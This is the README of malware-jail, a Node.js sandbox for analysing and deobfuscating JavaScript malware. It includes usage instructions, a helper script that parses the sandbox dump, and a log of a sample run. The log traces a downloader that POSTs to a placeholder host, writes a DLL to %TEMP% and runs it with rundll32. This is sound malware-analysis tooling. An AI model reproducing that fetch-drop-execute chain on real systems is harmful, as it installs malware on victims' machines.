malware-jail: Sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction


malware-jail

Sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction. Written for Node.js

malware-jail is written for Node’s ‘vm’ sandbox. It currently implements the WScript (Windows Scripting Host) context in env/wscript.js, at least the parts frequently used by malware. The Internet browser context is partially implemented in env/browser.js.

Runs on any operating system. Developed and tested on Linux with Node.js v6.6.0.

Installing

git clone https://github.com/HynekPetrak/malware-jail.git
cd malware-jail
npm install

Usage

bash@linux# node jailme.js -h -b list

7 May 20:54:52 - mailware-jail, a malware sandbox ver. 0.13
7 May 20:54:52 - ------------------------
7 May 20:54:52 - Usage: node jailme.js [[-e file1] [-e file2] .. ] [-c ./config.json] \
7 May 20:54:52 - [-o ofile] [-b id] \
7 May 20:54:52 - [-s odir] [--down] [malware1 [malware2] .. ]
7 May 20:54:52 - -c config .. use alternative config file, preceed with ./
7 May 20:54:52 - -e ifile ... js that simulates specific environment
7 May 20:54:52 - -o ofile ... name of the file where sandbox shall be dumped at the end
7 May 20:54:52 - -s odir ... output directory for generated files (malware payload)
7 May 20:54:52 - -b id ... browser type, use -b list for possible values
7 May 20:54:52 - -t msecs ... number of miliseconds before terminating execution, default 1 minute
7 May 20:54:52 - --trace ... print stack trace with every log line
7 May 20:54:52 - --down ... allow downloading malware payloads from remote servers
7 May 20:54:52 - --h404 ... on download return always HTTP/404
7 May 20:54:52 - malware ... js with the malware code
7 May 20:54:52 - If no arguments are specified the default values are taken from config.json
7 May 20:54:52 - Possible -b values: [ 'IE11_W10', 'IE8', 'IE7', 'iPhone', 'Firefox', 'Chrome' ]


In the examples folder you may find a deactivated malware file. Run the analysis with:

node jailme.js -c ./config_wscript_only.json --down=y malware/example.js

Browser-based malware can be tested with:

node jailme.js -b IE11_W10 malware/example_browser.js

At the end of the analysis the complete sandbox context is dumped into a ‘sandbox_dump_after.json’ file.

You may want to examine the following entries of ‘sandbox_dump_after.json’:

  • eval_calls – array of the arguments passed to every eval() call. Useful when eval() is used for deobfuscation.
  • wscript_saved_files – content of all files that the malware attempted to drop. The actual files are saved into the output/ directory too.
  • wscript_urls – all URLs that the malware intended to GET or POST.
  • wscript_objects – WScript or ActiveX objects created.

‘sandbox_dump_after.json’ uses JSONPath references, as implemented by JSON-js/cycle.js, to encode duplicated or cyclic references to the same object.
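As an added example (not part of malware-jail), the following Node.js script loads such a dump, resolves the cycle.js "$ref" entries without using eval(), and lists the eval() arguments, URLs, dropped file names and created objects. The exact shape of wscript_saved_files and wscript_objects is an assumption here, and the sample dump is constructed from the values shown in the log below.

```javascript
// Added example, not part of malware-jail: triage a sandbox_dump_after.json.
// The dump is written with JSON-js/cycle.js, so a repeated object appears as
// {"$ref": "$[\"wscript_objects\"][1]"}; resolveRef walks that path without eval().
// Assumed shapes (not confirmed by the README): wscript_saved_files is an object
// keyed by file path, wscript_objects is an array of {name} records.
const PATH_RE = /^\$(?:\[(?:\d+|"(?:[^"\\]|\\.)*")\])*$/;   // validates a whole $ref
const SEGMENT_RE = /\[(?:(\d+)|"((?:[^"\\]|\\.)*)")\]/g;    // one [index] or ["key"] step

function resolveRef(root, ref) {
  if (!PATH_RE.test(ref)) throw new Error('unexpected $ref: ' + ref);
  let node = root;
  for (const m of ref.matchAll(SEGMENT_RE)) {
    node = node[m[1] !== undefined ? Number(m[1]) : JSON.parse('"' + m[2] + '"')];
  }
  return node;
}

// Equivalent of JSON.retrocycle(): replace every {"$ref": ...} in place.
function retrocycle(root) {
  const visit = (node) => {
    for (const k of Object.keys(node)) {
      const v = node[k];
      if (v === null || typeof v !== 'object') continue;
      if (typeof v.$ref === 'string') node[k] = resolveRef(root, v.$ref);
      else visit(v);
    }
  };
  visit(root);
  return root;
}

// Pull out the entries the README recommends examining.
function summarize(dump) {
  const d = retrocycle(dump);
  return {
    evalCalls: (d.eval_calls || []).length,
    urls: [...new Set(d.wscript_urls || [])],
    droppedFiles: Object.keys(d.wscript_saved_files || {}),
    objects: (d.wscript_objects || []).map((o) => o.name),
  };
}

// Constructed sample dump in the assumed shape, using values from the README log.
const SAMPLE_DUMP = {
  eval_calls: ['var cmd = "rundll32 %TEMP%\\\\57020551.dll, DllRegisterServer";'],
  wscript_urls: ['http://EXAMPLE.COM/redir.php', 'http://EXAMPLE.COM/redir.php'],
  wscript_saved_files: { '%TEMP%\\57020551.dll': 'MZ...(payload bytes)' },
  wscript_objects: [{ name: 'WScript.Shell' }, { name: 'MSXML2.XMLHTTP' }],
  last_object: { $ref: '$["wscript_objects"][1]' },
};

console.log(summarize(JSON.parse(JSON.stringify(SAMPLE_DUMP))));
```

For a real run, replace SAMPLE_DUMP with JSON.parse(fs.readFileSync('sandbox_dump_after.json', 'utf8')).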

bash@linux# node jailme.js malware/example.js

11 Jan 00:06:24 - Malware sandbox ver. 0.2
11 Jan 00:06:24 - ------------------------
11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
11 Jan 00:06:24 - Malware files: malware/example.js
11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
11 Jan 00:06:24 - Output directory for generated files: output/
11 Jan 00:06:24 - ==> Preparing Sandbox environment.
11 Jan 00:06:24 - => Executing: env/eval.js
11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
11 Jan 00:06:24 - => Executing: env/wscript.js
11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
11 Jan 00:06:24 - ==> Executing malware file(s).
11 Jan 00:06:24 - => Executing: malware/example.js
11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
11 Jan 00:06:24 - Created: WScript.Shell[1]
11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
11 Jan 00:06:24 - Created: ADODB_Stream[3]
11 Jan 00:06:24 - ADODB_Stream[3].Open()
11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2)
11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer)
11 Jan 00:06:24 - ADODB_Stream[3].Close()
11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - The sandbox context has been saved to: sandbox_dump_after.json


Copyright (c) 2016 Hynek Petrak

Source: https://github.com/HynekPetrak/